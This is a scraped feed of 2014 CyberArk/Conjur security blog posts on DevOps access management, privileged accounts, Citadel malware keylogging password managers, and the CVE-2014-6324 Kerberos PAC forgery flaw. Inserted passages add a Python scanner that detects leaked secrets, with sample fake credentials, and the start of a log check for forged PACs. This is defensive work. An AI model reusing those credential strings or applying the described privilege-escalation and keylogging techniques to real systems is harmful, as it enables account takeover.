First and foremost, the tools and technologies that describe the typical DevOps team have grown significantly over the last 12 months. In looking across the entire Conjur customer base, and from the people we speak to regularly in the community, we are seeing the emergence of a reference architecture for DevOps that is markedly different from what we saw a year ago. Specifically:

  • (Almost) everyone is running a hybrid platform;
  • Automation (and tools to enforce it) are a given;
  • Security is increasingly a DevOps function, in part or whole.


Access Management for Any Cloud

While there was never truly a heyday for single-cloud deployments, the last year has proven that hybrid cloud architecture is here to stay. As far back as April, hybrid cloud was being declared “king” by RightScale, who noted that 98% of respondents are using cloud now, and 58% of those people are doing so with hybrid cloud as the cornerstone of their strategy.

For DevOps teams, this creates a unique challenge: how to authenticate and authorize users, machines, and code across multiple different platforms, rather than relying on a single vendor/platform solution (such as AWS IAM).

Automate, Automate, Automate

The tools used to deploy machines and infrastructure across this new kind of infrastructure are more clearly delineated than they once were. From a treetop perspective, the list breaks into three parts: (1) configuration management, such as Chef, SaltStack, and Puppet, used to create machines and software-defined architecture quickly and consistently, (2) continuous integration technology, such as Hudson, Jenkins, and CruiseControl, and (3) platform abstraction technologies such as Docker, Rocket, and VMWare, often used together to create clean, consistent, and easily deployed dev, test, and production environments.

Of course, this also creates a new threat surface for DevOps – something we will look at in more detail in the coming blogs in this series. Building in security, especially around access and authorization, has been hindered by a lack of innovation in the legacy point solutions that managed this kind of concern in the on-premise world. The tools that worked inside the server closet simply haven’t remained relevant when forced to map to this new, highly-automated, and cloud-native environment.

Nobody Puts Compliance in the Corner

Audit, compliance, and security all need to be rebuilt: get this wrong, and you have a complete fail (see Code Spaces); get it right, and you avoid the kinds of outages that take major companies offline and block cloud initiatives.

From HIPAA to SOX, DevOps architecture, tools, and practices are in scope for audit teams, and ensuring that there is a complete and immutable record of all privilege-related activities is essential. Practices that are easy — putting secrets in source control systems, for example — are not necessarily wise, and one of the functions of a good audit is to ensure that shortcuts don’t put the business or the data it manages at risk.

The good news is that there are easy ways to think through the implications for DevOps. In the second part of this series, we’ll take a deeper look at the cloud landscape, and explore how and why cloud native tools have become the foundation for any DevOps-aligned security and compliance program, and cover the three problems that any team must consider when building for cloud native architecture.

]]>
Machine Intelligence – The New “Big Data” https://www.cyberark.com/blog/machine-intelligence-the-new-big-data/ Tue, 30 Dec 2014 12:58:00 +0000 https://cyberarkvx2.wpengine.com/blog/machine-intelligence-the-new-big-data/

Big data has been an incredibly hot topic over the past few years, with a rise in both the number and types of environments in which analytics run. With that trend has come an increasing shift of computational resource and data custody to the cloud; from genomic analysis (as Conjur customer GNS Healthcare does in the cloud) to machine learning (as Tamr provides), the adoption of big data analytics in the cloud brings with it a number of new considerations, including privileged identity and access management and security.

Shivon Zilis thinks the next one will be “machine intelligence”. Zilis is an investor at Bloomberg Beta, and some of her work on the Machine Intelligence Landscape was recently published in Forbes.


Conjur is excited to be featured on this list, and is even more excited that our space, security / authentication (and we’d like to add authorization), is marked as one of the transformative areas for this emerging space. Forbes contributor Anthony Wing Kosner picked up Zilis’s article, connecting it with the automation landscape of current offerings and their use in production environments.

The evolution of cloud and the intersections between its usage and data analysis, identity, and security is an incredible place to be. Over the course of 2015, we will see both tremendous innovation and significant new challenges; we believe strongly that the ways in which both will be addressed will require new solutions that are themselves cloud native and platform agnostic.

Conjur is changing the privileged identity management (PIM) and cloud workload security markets, and doing so in a way that’s fundamentally aligned with both security and DevOps teams and their cultures. If you’re on board, we would love to tell you how and why we’re different.

Reach out and get started today.

]]>
3 Lessons on CLI UX Design https://www.cyberark.com/blog/3-lessons-on-cli-ux-design/ Mon, 22 Dec 2014 11:21:00 +0000 https://cyberarkvx2.wpengine.com/blog/3-lessons-on-cli-ux-design/

Last week’s DevOps Weekly included a link to an interesting article on the metrics and merits of good user experience (UX) design for CLI applications. Primarily based on an interview with Randall Hansen, who formerly led the UX design team at (Conjur customer) Puppet Labs, the article raised a couple of particularly important points that we hold as truths when designing Conjur, as well:

CLI UX Design Lessons

  • CLI design should be elegant
  • Speed trumps splash
  • Good documentation is foundational

CLI design should be elegant.

One of the main points in the Medium article is that the CLI is used by what they call sysadmins, although we would argue that the target user could equally be a DevOps user. If one agrees that the goal of a user experience and interface should be to delight the user, then there is a distinction between those things which a typical end-user will be delighted by, and those which lead to a feeling of delight in an administrative user.

In an apocryphal case study, Hansen relates how a stock exchange application malfunctioned, causing tens of millions of dollars of loss for every second that it continued running. With a quick set of keystrokes, the admin using a CLI was able to quickly identify and kill the process. If elegance is defined as “simple and powerful”, then this is a fantastic example of how to ensure that it’s in place for a command line application.

It’s also one of the primary ideals we hold when designing Conjur’s CLI. From tab-completion on Conjur’s commands to context-appropriate help, simplicity and appropriate context are woven into every command and interaction that our command-line users will experience.


Speed trumps splash.

A second point from Hansen is also explained by example: “When Gmail goes down for ten minutes, the entire internet freaks out; the difference between those ten minutes of inconvenience and some potentially catastrophic downtime might hinge on the user experience that a sysadmin encounters when solving the problem.”

Conjur, thankfully, doesn’t take down systems — even if an entire Conjur master server were to be hit with an rm -rf, our high-availability architecture will ensure that requests for authz events, secrets, and permissions will continue to function. However, being able to quickly and gracefully interact with sysadmins to prevent inadvertent mistakes is a core design intent; while we do see value in building a rich user experience for visualizing authz events and data, we have made an explicit decision to do so not at the expense of the CLI, but in conjunction with it.

Good documentation is foundational.

Finally, we agree wholeheartedly with Hansen on the point that good documentation is critical for a CLI user. More than simply a set of API references — although those are necessary, too — documentation for a command line experience needs to provide specific use cases and explain both what and why they matter.

For Conjur, that means having a great set of tutorials that walk users through the basic flows that they will encounter when using the system. From “Conjurizing” users to migrating secrets to the system to integrating with LDAP systems, we believe that time and effort spent on tutorials will translate directly to an improved (and hopefully even delightful) Conjur experience.

All of our tutorials are available on our Developer site.

And while we’re proud of what we have built, we’re just getting started. We want to hear from you, especially if you’re in the trenches of the DevOps movement, dealing with myriad CLI tools every day. What makes your life easier? What’s missing?

Of course, if you’re not yet using Conjur, we’d love to have you on board with us. We’re changing the future of authorization-as-a-service, and we’d be happy to get a copy of Conjur into your hands today. Just click the big blue “Get Started” button below, and we’ll set you up — and let us know what your user experience is like, and where it can be better!

 

]]>
Who Cares? Access Management for Any Cloud! https://www.cyberark.com/blog/who-cares-access-management-for-any-cloud/ Wed, 17 Dec 2014 14:09:00 +0000 https://cyberarkvx2.wpengine.com/blog/who-cares-access-management-for-any-cloud/  

Last week, Bloomberg ran a story about a major software development shop that has a truly hybrid cloud environment: a mix of Azure and AWS. The article is great (and worth a read), but it can be summarized simply: nobody picks just one provider any more.

Quoting from the piece, the client of the two cloud providers notes that he chose to hybridize across both platforms in response to last month’s Azure outage. His decision — a defensive play that makes it comparatively easy to switch back to AWS if Azure fails — “underscores the challenges Microsoft faces as it tries to wrest market share from industry leader and crosstown competitor Amazon.”

From the perspective of a neutral platform provider that works with both (as well as with Rackspace, VMware and a wide variety of bare-metal providers), what the Bloomberg article describes is a case for abstracting access management away from the underlying platform. Imagine the effort involved in switching from one provider to another: as part of the process, how will you handle access management? User permissions? Service-to-service authentication, so that your Jenkins server can keep operating without a rewrite of your entire IAM stack?

One of the major benefits of the Conjur approach is that it decouples identity and access management from any particular cloud vendor. In doing so, our customers can get to a comfortably neutral place: who cares who wins the cloud platform argument? Access management will work regardless — users and services will be able to make Conjur calls no matter what the architecture is that underpins their actual work. Audit and compliance can see events and logs without interruption, even as the hardware and software environments shift.

It’s a classic write-once, use-anywhere scenario: Conjur is access management for any cloud, bringing elasticity to IAM and backing it up with strong zero-trust networking principles and a DevOps-friendly toolchain. And once it’s in place, who cares who your cloud provider is?

 

]]>
NIST Recommendations for Securing Virtual Environments: Don’t Forget about Privileged Accounts https://www.cyberark.com/blog/nist-recommendations-securing-virtual-environments-dont-forget-privileged-accounts/ Thu, 11 Dec 2014 18:07:39 +0000 https://www.cyberark.com/blog//

By John Worrall

Business-critical data increasingly is being moved to the cloud, which is why the new NIST recommendations for how enterprises and IT departments can better secure their virtual environments and hypervisor software are incredibly important.

The guidelines highlight two different approaches to securing hypervisors – the first is based on architectural options and the second is based on configuration choices that form the core administrative functions.

NIST recommends accounting for five primary hypervisor functions: 1) execution isolation for virtual machines, 2) device emulation and access control, 3) execution of privileged operations for guest virtual machines (VMs) by the hypervisor, 4) management of VMs, and 5) administration of hypervisor host and hypervisor software.

The report goes on to make 22 security recommendations, each tied to one of these primary hypervisor functions. One of them addresses direct access: “the number of user accounts (including privileged accounts) requiring direct access to hypervisor host should be limited to bare minimum (i.e., two or three).”

Moreover, the report recommends that user accounts be managed through a directory infrastructure, which lets organizations monitor account changes in a central location (e.g. deleting an account when an employee leaves the organization) and set password policies (e.g. complexity and expiration rules) that are centrally defined and enforced.

While hypervisor security is important regardless of which approach your organization chooses to adopt, here at CyberArk we are firm believers that privileged account security should be at the core of every comprehensive security strategy. According to our recent threat report, privileged accounts are exploited in 80-100% of all advanced attacks. This means that organizations should be most concerned about protecting against the exploitation of privileged accounts that allow perpetrators to move across their entire virtualized environment.

As the first step for any organization that has implemented virtual environments and hypervisor software, there should be a full sweep and inventory of existing privileged accounts to determine how many exist, how many are being used and where flaws in the system might exist. Free tools such as our Discovery & Audit utility can help with this. Next, organizations must continue to diligently control and monitor privileged account activity in order to properly secure the network.

The sooner organizations realize that privileged accounts are at the core of all successful targeted attacks and data breaches – regardless of whether employees work in local or virtualized environments – the sooner they can close the door on would-be attackers, and take control of their network and data. Our white paper is a good resource to find out how CyberArk can help organizations to effectively and efficiently meet the full range of requirements regarding privileged accounts related to NIST.

]]>
Citadel Malware Targets Password Management Applications https://www.cyberark.com/blog/citadel-malware-targets-password-management-applications/ Tue, 09 Dec 2014 22:14:20 +0000 https://www.cyberark.com/blog//

By Lavi Lazarovitz

Faced with the prospect of remembering passwords for multiple websites and offline applications, people are increasingly using password managers so they don’t have to remember their credentials. While a significant convenience, they also represent a valuable target for hackers – compromising these password managers can give attackers user credentials that can lead to sensitive personal and business assets.

Password managers such as KeePass, for instance, allow users to create a password-protected database of user names and passwords. Password managers can be a suitable place for private account credentials such as Facebook and Twitter logins and, in some cases, workstation and network access credentials.

However, as a recent Computerworld article notes, Citadel malware is infamous for compromising “online banking credentials and other financial information by modifying banking sites on the fly when opened by users in their local browsers.” To compromise password managers, the malware was reconfigured to start key-logging whenever a password manager's process is running, capturing the master password as it is typed and thereby giving the attackers what they need to open the password database.

This type of compromise does not give an attacker direct access to a target network, but provides a foot in the door by collecting business credentials that are often re-used for corporate assets.

Through this, attackers have turned another security obstacle into a possible jackpot.

Access to core assets requires privileged credentials; cyber attackers know this, which is why those credentials are so highly sought after. Whether collected from password managers or sniffed out elsewhere, they allow attackers to maneuver easily and even manipulate the business's own defenses, such as anti-virus and intrusion detection systems.

So what should be the best practice of handling sensitive passwords?

The short answer is: take the user out of the equation.

The first part of the problem is how to store sensitive passwords – in this case, privileged accounts. Take our Enterprise Password Vault for example. The architecture itself works like a bank vault. Each vault contains a collection of user-defined ‘safes’ where access is limited to a user or group. This means that each user or group may manage their own passwords without giving unwanted access to other parties within the organization. The Vault is bastion-hardened, allowing only CyberArk-specific traffic in and out, and all credentials are encrypted within the individual safes. For further security, all key management is maintained by the system and every password is encrypted using a different key. Additionally, a variety of workflows can be established before a safe is used or accessed, including direct force reasoning, dual control, among others. You can get a full list here.

The second part of the problem is making sure passwords are never exposed and this can be done in a number of ways. The most basic way is by using one-time passwords, where exposure is pointless since the password won’t work beyond the initial use.  Since this isn’t always possible based on practical business needs, it’s important to have the ability to connect the credential management system directly with devices and applications so the user never has to see, copy or enter a password.

Attackers can dynamically modify their attack vectors endlessly, evading sophisticated intrusion detection systems just by using compromised legitimate credentials. The best practice for businesses is to securely store credentials and conceal them from end users to reduce the risk of losing them to the wrong hands. A comprehensive privileged account security solution is a good start. For more, have a read through our approach.

]]>
Panel Recap – Boston Cybersecurity Symposium https://www.cyberark.com/blog/panel-recap-boston-cybersecurity-symposium/ Tue, 09 Dec 2014 19:05:00 +0000 https://cyberarkvx2.wpengine.com/blog/panel-recap-boston-cybersecurity-symposium/  

On Friday of last week, I had the opportunity to participate in a panel discussion at the Boston Cybersecurity Forum, talking about Operationalizing Security in the Cloud. I was joined by a stellar crew from across the industry:

Over the course of our hour, we covered a pretty wide range of topics, from the emergent trends in the security space (more automation, the rise of the non-human actor as a threat vector, and the dissolution of the perimeter) to whether anti-virus as an industry is dead (probably not, but the freeware tools are more than good enough; refocus that spend on authz, intrusion detection, and visibility tools).

Some of the more interesting questions that came out of the interactive portion of the discussion had to do with the idea that DevOps infrastructure is changing the rules of the game for IT. As Sam pointed out at one point, the silo of infosec is an outdated model; decisions made “on the ground” by developers are generally not filtered through a separate team in most organizations. Although automation and continuous integration platforms have become essential components of most organizations' product development processes, the challenges around implementing good cybersecurity have not disappeared. What has happened is that they tend to be managed in conjunction with the development of the infrastructure itself, meaning that they are subject to the same time, expertise and urgency pressures that any DevOps project experiences.

One thing that all of us on the panel see as a result of this is the increased need for better visibility and control in the space. As increasingly important workloads are being moved to cloud platforms, a new set of best practices is emerging. These engagement rules have less to do with keeping people out and building strong firewalls, and more to do with the creation of situational awareness across the entire environment, often in spite of that environment’s elasticity.

Some of the ideas we started to outline in reply to our audience were to revamp the underlying infrastructure to build universal identity for both users and non-human actors, to implement technologies and tools that help identify anomalous activity, and to establish strong authorization policies that protect information at the application level.

In a sense, this is the beginning of a security architecture for the cloud – a topic I’m excited to continue to explore in the coming months.

 

 

]]>
Every Industry, Every Company is a Potential Target of an APT Attack https://www.cyberark.com/blog/every-industry-every-company-potential-target-apt-attack/ Fri, 05 Dec 2014 15:28:02 +0000 https://www.cyberark.com/blog//

By John Worrall

“Every company has something of value to protect, something that attackers want. In today's connected business world, everyone is a potential target.” – Craig Williams, Cisco Talos Security Intelligence and Research Group

Two weeks ago, CyberArk released a new threat research report, analyzing the forensic experiences of the world’s leading cyber threat investigators in remediating the most devastating breaches.

The report identifies the commonalities across advanced attacks, enabling organizations to better understand their adversary so they can build more effective defenses against the latest threats. We’ll be blogging about the six primary findings of the report – but if you want to read them for yourself, you can download the report for free.

Finding #1:  No One is Safe

While there will always be outliers, targeted cyber-attacks are typically conducted for two primary reasons: financial gain through the monetization of stolen data or cyber-espionage.

The common belief was that unless you were a bank, credit card processor or government (affiliated) organization, you didn't have to worry about being the target of an attack. After all, what does a small, low-tech manufacturing company have that a Russian or Chinese cyber attacker could monetize?

The threat investigators in the report have traced attacks to non-traditional targets such as trucking companies and all types of professional services firms, from management consultants and auditors to litigation attorneys, frequently as a key step in an attack on a business partner. As organizations continue to strengthen defenses, attackers increasingly look to exploit the smaller, less security-conscious partners to gain de facto backdoor access to targeted networks.

In an increasingly interconnected world, the tactic of attacking supply chain partners has been used multiple times in some of the biggest breaches in recent memory. The reasons are simple: these soft targets provide an entry way into the networks of more secure business partners. And what we found in prior research is that while more than 60 percent of businesses allow third-party vendors remote access to their internal networks, 58 percent have no confidence their partners are properly securing and monitoring privileged access to their networks.

When it comes to espionage, gaining network access to the primary target may not be the goal. For example, one security investigator described a cyber attack against a major manufacturer of pipes and plumbing parts. Forensic evidence suggested the attackers breached the IT systems of the pipe manufacturer as an easier way to collect information about what types of energy exploration their customers were doing, based on the pipes / fittings they were buying. This is highly valuable intellectual property and easily monetized.

The threat report is full of stories like this, demonstrating why cyber security today cannot be just about your own business but has to account for every touch point on the extended corporate network. This is why it's critical to identify and lock down privileged accounts within your organization, secure remote vendor access, and understand what your trusted business partners are doing to secure their own businesses.

]]>
Doing Cloud Right: Don’t Have a Big, Public Screwup https://www.cyberark.com/blog/doing-cloud-right-dont-have-a-big-public-screwup/ Fri, 05 Dec 2014 09:58:00 +0000 https://cyberarkvx2.wpengine.com/blog/doing-cloud-right-dont-have-a-big-public-screwup/  

CEO and co-founder Elizabeth Lawler was asked to be a panelist at Work-Bench's Enterprise Security Summit in September, where she was joined by security experts from Okta, Skyhigh Networks and CipherCloud for the panel “Don't Have A Big, Public Screwup: How To Do Cloud Right”, moderated by Bloomberg Businessweek.

If you couldn’t make it to the event, we’re happy to be able to share the session via video! Check it out here:

 

We’d love to hear your questions and feedback, as well – drop us a line at info@conjur.net if you’d like to be a part of the discussion!

 

 

]]>
Secrets Management: Sharks, DevOps, and Dark Alleys https://www.cyberark.com/blog/secrets-management-sharks-devops-and-dark-alleys/ Thu, 04 Dec 2014 08:05:00 +0000 https://cyberarkvx2.wpengine.com/blog/secrets-management-sharks-devops-and-dark-alleys/  

If secrets management were (painfully) made into a weekly CW drama, it would be something like a horror film trope: we'd watch our vulnerable protagonists slip from dark servers to ominously lit git repositories, tensely waiting for someone to slip from the shadows and steal them away. In the admittedly more prosaic real world, this plot unfolds regularly.

When it goes awry, when the mechanisms of access to important systems and data are exposed, it tends to be the media that cries foul, and user data that is outlined on the metaphorical asphalt as systems are breached and careers fall apart. At this point, after so many high-profile breaches over the past two years, the story is nearly a trope unto itself.

Why? Is this (mis)management due to a lack of product solutions, good intentions poorly executed, or just a nascent complacency along the lines of “it won't happen to me”?

The fact is, security and convenience are often at odds. For modern infrastructure — the kind built by DevOps teams designing around principles of scalability, automation, and elasticity — secrets represent the “how” of access management. API keys, credentials, and certificates are among the more common types of data that broker both user-to-service and service-to-service connectivity, and making them available to code and people is a requirement that often gets balanced poorly against keeping them highly secure.

Make access mechanisms hard to use, and there’s an immediate negative: things break. Distribute secrets widely and there’s a theoretical negative: something bad will happen in the future.

This trade-off plays to a well-known blind spot, and “do-ers” like DevOps people can be particularly susceptible to it, given the sheer volume of work and urgency they operate under. The weakness is inherent to human nature itself; risk assessment is not something we're good at. Ten years ago, in an oft-quoted interview, Bruce Schneier quipped, “More people are killed every year by pigs than by sharks, which shows you how good we are at evaluating [it].”

As foundational as the storage, distribution and auditability of secrets are for protecting important data, many organizations have secrets moving through less-than-secure channels on a daily basis: emails, text messages, chats, GitHub repos, shared VM images, Docker images, etc. Problematically, none of these were designed to carry this kind of data, and there is often no audit trail for how the information moved into or out of them. This isn't simply a “good housekeeping” problem; it's an essential weakness in architecting defensible infrastructure.

Balancing technical elegance and simplicity (which are of obvious importance to DevOps) with robust, secure, well-designed secrets management is not a trivial problem. It’s also not one that most teams are primarily concerned with — unless you’re a security company, keeping API keys safe and audited is likely not why you go to work every day. Conjur is a purpose built permissions and secrets management platform, designed to make both easy.

 

]]>
The Privileged Aspect of the Recent Kerberos Vulnerability https://www.cyberark.com/blog/privileged-aspect-recent-kerberos-vulnerability/ Wed, 03 Dec 2014 20:01:19 +0000 https://www.cyberark.com/blog//

By John Worrall

A rare, out-of-band patch from Microsoft a couple of weeks ago once again reminds us all that targeted attackers are constantly going after privileged accounts. Microsoft pushed out an emergency patch to address a critical vulnerability in Microsoft Windows Kerberos KDC. According to the Microsoft Security Bulletin, the vulnerability, “could allow an attacker to elevate unprivileged domain user account privileges to those of the domain administrator account.”

This vulnerability is severe, as it essentially bypasses the established privilege controls, making it possible to perform privileged operations with a hijacked standard user account. Attackers exploiting it can compromise any computer in the domain, including domain controllers.

Microsoft has patched this vulnerability, but it is another reminder that attackers covet the access and operational powers associated with privileged accounts. In fact, most targeted attacks focus on gaining these privileges first and foremost, by stealing the credentials for these accounts, as was borne out in a recent threat research report we conducted.

In that report we interviewed six leading threat investigation teams from leading firms and found more than 80% of serious cyber attacks exploit privileged accounts at some point in the process. Threat investigators from Deloitte explain, “Privileged accounts are a hall pass that can get attackers where they want to go without constraints. It enables them to traverse the network without hindrance.”

New vulnerabilities are constantly being found even in the most established controls, such as SSL/TLS (Heartbleed), Bash (Shellshock) and now Microsoft's implementation of Kerberos. Stopping the exploitation of privileged accounts is often an organization's last line of defense before a data breach, which highlights the need for anomaly detection and privileged user behavior monitoring. With proper control of privileged accounts in place and anomaly detection employed to catch their abuse, it becomes possible to mitigate these targeted attacks. As Jim Aldridge of Mandiant observes in CyberArk's report, “At this point, it's critical to detect attacker movements, because it's basically the last chance you have before they steal data.”

]]>
Tales from the Field – Authz Compliance Webinar https://www.cyberark.com/blog/tales-from-the-field-authz-compliance-webinar/ Mon, 01 Dec 2014 18:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/tales-from-the-field-authz-compliance-webinar/  

It’s hard to believe, but we’re at the end of 2014 — and what a doozy of a year. Between the recent Sony breach to the continued struggles for compliance at the VA, from Code Spaces to Active Directory, a consistent theme of the year past has been the struggle to understand security not only in terms of the perimeter, but also as a function of authentication, authorization, and audit.

In the third and final in our series of authorization-focused webinars for 2014, we’re very excited to be joined by special guest panelist Dan Kamalic. Dan is a cloud architect with GNS Healthcare, where he helped identify and implement Conjur to address a range of authz and compliance-related needs. We’ll be hosting a live discussion with Dan and the Conjur team on December 16 at 1pm EDT, talking about both the broader changes that are driving the need for better authorization security and authz compliance, as well as the specifics of using Conjur at GNS Healthcare.

We’re really excited to have Dan joining us, and hope you will, too. You can register for the session by clicking the “Register Now” button below:

We’ll be setting aside lots of time to take questions from the audience, as well; this is a great chance to ask a real presenter what their experiences were when implementing Conjur, what the alternatives they considered were, and what authorization-related advice and insight they’d offer to anyone just getting started with a major cloud initiative.

And, of course, if you’d like to follow along with your own free trial of Conjur, you can sign up any time. It’s simple and fast – just click here!

 

]]>
Webinar Recap – Securing Docker with Conjur https://www.cyberark.com/blog/webinar-recap-securing-docker-with-conjur/ Tue, 25 Nov 2014 17:36:00 +0000 https://cyberarkvx2.wpengine.com/blog/webinar-recap-securing-docker-with-conjur/  

Docker is one of the hottest and most hyped technologies around, but for many organizations, there are still pretty significant questions about how to secure it for enterprise use.

In this technical webinar on “Securing Docker with Conjur”, CTO Kevin Gilpin and VP and founding member Kevin O'Brien discuss the uses of Docker, look at some of the more common bad practices and insecure approaches to its use, and examine how to create and enforce real-time security in a Docker deployment through the use of Conjur, without adding counterproductive steps that slow processes or force developers into work-arounds.

Watch now to learn the best practices for securing Docker, including:

  1. Not storing secrets in Docker images themselves
  2. Avoiding anti-patterns that trade convenience for security
  3. Ensuring a complete audit trail is available around Docker use
  4. Making security an enabler, not a disabler
  5. Defining and enforcing a Development / Test / Production separation and workflow policy
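The first two items above, and the list of leaky channels in the “Sharks, DevOps, and Dark Alleys” post (chats, git repos, shared VM and Docker images), come down to one check a team can automate: does a credential ever get written into an artifact that gets copied around? The Python below is an added example written for this page, not code from the webinar or from Conjur. It flags Dockerfile instructions that bake a secret into an image (ENV and ARG values, COPY/ADD of credential files, a password embedded in a clone URL) and runs a generic pattern-and-entropy pass over any other text channel, here a constructed chat transcript. The secret-name patterns, the entropy threshold, both sample Dockerfiles and the chat lines are my assumptions; the hardened Dockerfile shows the alternative the webinar argues for, with the credential supplied at run time rather than baked in at build time.

```python
import math
import re
from collections import Counter

# Heuristics below are assumptions made for this example, not Conjur tooling.
SECRET_NAME = re.compile(
    r"(?i)(passw(or)?d|secret|token|api[_-]?key|access[_-]?key|private[_-]?key|credential)"
)
KNOWN_SHAPES = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "pem_private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "url_with_password": re.compile(r"\b[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@"),
}
# Files that should never be COPY'd into a layer; list them in .dockerignore instead.
SENSITIVE_FILES = re.compile(r"(^|/)(\.env|id_rsa|id_ed25519|\.npmrc|\.pypirc|credentials)$")


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking tokens usually score above 3.5."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_like_secret_value(value: str) -> bool:
    """A long, high-entropy literal. A reference such as $DB_PASSWORD is not a secret."""
    v = value.strip().strip("\"'")
    return len(v) >= 16 and not v.startswith("$") and shannon_entropy(v) > 3.5


def scan_text(text: str, source: str = "text") -> list:
    """Generic pass for any channel (chat, commit diff, shell history, config)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pat in KNOWN_SHAPES.items():
            if pat.search(line):
                findings.append((source, lineno, name))
        for m in re.finditer(r"([A-Za-z_][A-Za-z0-9_]*)\s*[=:]\s*(\S+)", line):
            key, val = m.group(1), m.group(2)
            if SECRET_NAME.search(key) and looks_like_secret_value(val):
                findings.append((source, lineno, "secret_assignment:" + key))
    return findings


def scan_dockerfile(text: str) -> list:
    """Dockerfile-aware pass. ENV persists in the image config, ARG values show in
    `docker history`, and a COPY/ADD of a credential file stays in that layer even
    if a later RUN deletes it."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for name, pat in KNOWN_SHAPES.items():
            if pat.search(line):
                findings.append(("Dockerfile", lineno, name))
        parts = line.split(None, 1)
        instr, rest = parts[0].upper(), (parts[1] if len(parts) > 1 else "")
        if instr in ("ENV", "ARG") and rest:
            pairs = re.findall(r"([A-Za-z_][A-Za-z0-9_]*)=(\S*)", rest)
            if not pairs:  # legacy "ENV KEY value" form, or "ARG KEY" with no default
                head = rest.split(None, 1)
                pairs = [(head[0], head[1] if len(head) > 1 else "")]
            for key, val in pairs:
                if SECRET_NAME.search(key) or looks_like_secret_value(val):
                    findings.append(("Dockerfile", lineno, instr + "_persists_secret:" + key))
        elif instr in ("COPY", "ADD"):
            sources = [t for t in rest.split()[:-1] if not t.startswith("--")]
            for src in sources:
                if SENSITIVE_FILES.search(src):
                    findings.append(("Dockerfile", lineno, instr + "_credential_file:" + src))
    return findings


# Constructed anti-pattern: every credential here ends up inside the image.
BAD_DOCKERFILE = """\
FROM python:3.12-slim
# constructed example, not a real service
ENV DB_PASSWORD=Sup3r-S3cret-Pa55w0rd!
ARG NPM_TOKEN=npm_ab12cd34ef56gh78ij90
COPY .env /app/.env
COPY id_rsa /root/.ssh/id_rsa
RUN git clone https://deploy:hunter2hunter2@git.example.internal/app.git /app
CMD ["python", "/app/main.py"]
"""

# Constructed hardened form: the image carries no credential. The database password
# is injected into the container environment at run time, and the clone uses a
# BuildKit SSH mount that exists only for the duration of that RUN step.
GOOD_DOCKERFILE = """\
FROM python:3.12-slim
COPY app/ /app/
RUN --mount=type=ssh git clone git@git.example.internal:app.git /app/vendor
CMD ["python", "/app/main.py"]
"""

# Constructed chat transcript, one of the channels the post lists.
CHAT_LOG = """\
[10:02] dave: deploying now, creds are AKIAIOSFODNN7EXAMPLE / wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
[10:03] dave: db is postgres://app:Tr0ub4dor3xyz@db.internal:5432/prod
"""
```

Run it as a pre-commit hook or a CI step over every Dockerfile and every diff. An entropy threshold of 3.5 bits per character will occasionally flag a long, random-looking but harmless token, which is the right side to err on. The scanner cannot see a `.env` file swept in by `COPY . /app`, so pair it with a `.dockerignore`, and remember that a secret removed in a later layer is still present in the earlier one.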

 

]]>
CVE-2014-6324: Insider Threat and Active Directory https://www.cyberark.com/blog/cve-2014-6324-insider-threat-and-active-directory/ Mon, 24 Nov 2014 09:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/cve-2014-6324-insider-threat-and-active-directory/  

Microsoft remains a huge force in enterprise IT, both in the data center and more recently as a cloud infrastructure-as-a-service (IaaS) player. Active Directory is the most widely deployed and adopted directory, authentication, and authorization solution with over 95% of global businesses using AD as their system of record.

Since its introduction with Windows 2000, it has become the basis for numerous internal security and compliance controls, and many organizations attempt to meet their regulatory compliance requirements for cybersecurity through a complex mesh of AD groups and policies. However, the recent announcement of a critical flaw in the Kerberos implementation in Active Directory underscores why relying on black-box cryptography solutions for privileged user management is not the way forward for next-generation infrastructures.

Broadly, we look at Conjur and its cryptographic and token code (all open source; you can see some of it in SloSilo on GitHub) as a stronger alternative. Conjur is currently in use by organizations including Netflix, OpenDNS, Rally Software Development and Puppet Labs, all of which have adopted it to handle authorization, secrets management and distribution, and regulatory response, and any of which can validate for themselves that similar vulnerabilities do not exist in the SloSilo code we use.

So, why is Active Directory not the preferred system for these organizations? To understand that, let’s begin by looking more closely at this vulnerability in particular.

Understanding CVE-2014-6324

In mid-November, CVE-2014-6324 was published: a critical bug in Microsoft's domain controller code that allows a remote elevation-of-privilege attack, with Windows Server 2008 R2 and earlier noted as the most readily exploitable systems. Microsoft released security bulletin MS14-068 alongside it.

In essence, the issue is architectural: a user who holds valid domain credentials of any kind (a low-level administrator, or even a former employee whose account has not been fully expunged from your network) can forge the part of the Kerberos ticket exchange that carries the user's authorization data, the Privilege Attribute Certificate (PAC), because the Key Distribution Center (KDC) that runs on Windows domain controllers did not properly validate the PAC's signature. In doing so, any domain user can obtain arbitrary privileges.

There are three reasons why this is particularly devastating:

  • CVE-2014-6324 leaves you vulnerable to insider attacks: This vulnerability creates a significant threat surface for any organization running vulnerable Windows domain controllers, especially where malicious or compromised insiders can exploit the hole, elevate their privileges, and exfiltrate data (or worse);
  • Threats from malicious insiders are very common: Based on statistics from the 2013 Ponemon Cost of Cyber Crime Study, malicious insider attacks are among the most costly and common of all cybersecurity risks;
  • There is a real and significant cost associated with these kinds of breaches: The average time to resolve an attack is 32 days, with an average cost incurred during this period of $1,035,769, or $32,469 per day

Putting CVE-2014-6324 in Context

First and foremost, if you’ve built your authorization infrastructure on Active Directory, please make sure you have applied MS14-068 to any and all vulnerable machines.
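One check to run once the patch is on, written for this page as an added example rather than anything from the post or from the bulletin: the forged PAC describes a principal the KDC never actually authenticated, so the 4624 logon events recorded on domain controllers for a successful exploit can carry a Security ID that the directory resolves to a different account than the Account Name field, and an Account Domain in FQDN rather than NetBIOS form. The Python below looks for exactly that inconsistency over a constructed set of events and a constructed SID-to-name snapshot. Treat the heuristic as an assumption of mine rather than a guarantee: a forged PAC that keeps the user's own SID and only adds group memberships would not trip it, and the single-domain NetBIOS check needs adjusting for forests with trusts.

```python
# Constructed directory snapshot: SID -> (sAMAccountName, is_privileged).
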